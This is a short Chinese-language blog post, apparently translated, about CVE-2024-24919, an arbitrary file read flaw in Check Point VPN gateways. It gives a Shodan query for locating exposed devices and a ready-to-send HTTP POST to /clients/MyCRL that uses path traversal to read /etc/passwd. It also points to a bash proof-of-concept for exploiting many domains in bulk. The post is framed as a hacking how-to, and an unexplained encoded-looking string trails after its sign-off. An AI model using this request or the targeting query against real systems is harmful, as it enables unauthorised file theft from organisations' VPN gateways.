CVE-2024–24919:Check Point VPN网关中的任意文件读取漏洞
#$ubh@nk@r 2分钟阅读 · 2024年6月7日
引言
大家好,黑客朋友们!👋 在今天的文章中,我将讨论一个名为CVE-2024-24919的最新漏洞。我们将探讨如何识别该漏洞以及如何利用它。该漏洞在Check Point的CloudGuard网络安全设备中被发现。我还会向大家介绍一个工具,可以轻松地自动化利用此漏洞,覆盖大规模目标。那么,让我们开始吧。
Shodan搜索语法
任何人都可以使用以下Shodan搜索语法来查找存在此CVE的目标。语法如下:
Server:"Check Point SVN Foundation""org"
利用CVE-2024–24919
该漏洞可以通过向/clients/MyCRL端点发送特制的POST请求来利用。以下是漏洞利用的基本思路:
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/passwd
如果目标域名存在漏洞,它将显示/etc/passwd文件的内容。
自动化利用CVE-2024–24919
最后,我编写了一个Bash脚本来自动化此漏洞利用过程。
GitHub - starlox0/CVE-2024-24919-POC: 一个用于自动化CVE-2024-24919的简单漏洞利用代码(POC)
我主要利用了Curl命令行工具的单行命令。 我将其集成到了我的脚本中。您可以用它来测试单个域名或多个域名。
→ 针对多个域名的测试
多么简单!😄
今天就到这里。希望您能学到新东西。请继续关注我的下一篇文章。
感谢阅读!😄
如果您喜欢,别忘了点赞和关注我以获取更多文章。
祝您黑客愉快~ CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLNkfLFNQQTShIX6r8NWdTB6q2Q58n9qUz/4bOKG29WEpTrhaqSQOmZhCdmEm86OFQmJXE1k7fcUhBHzLwh58Ey25A7g89h4prYzdSx2bHjow==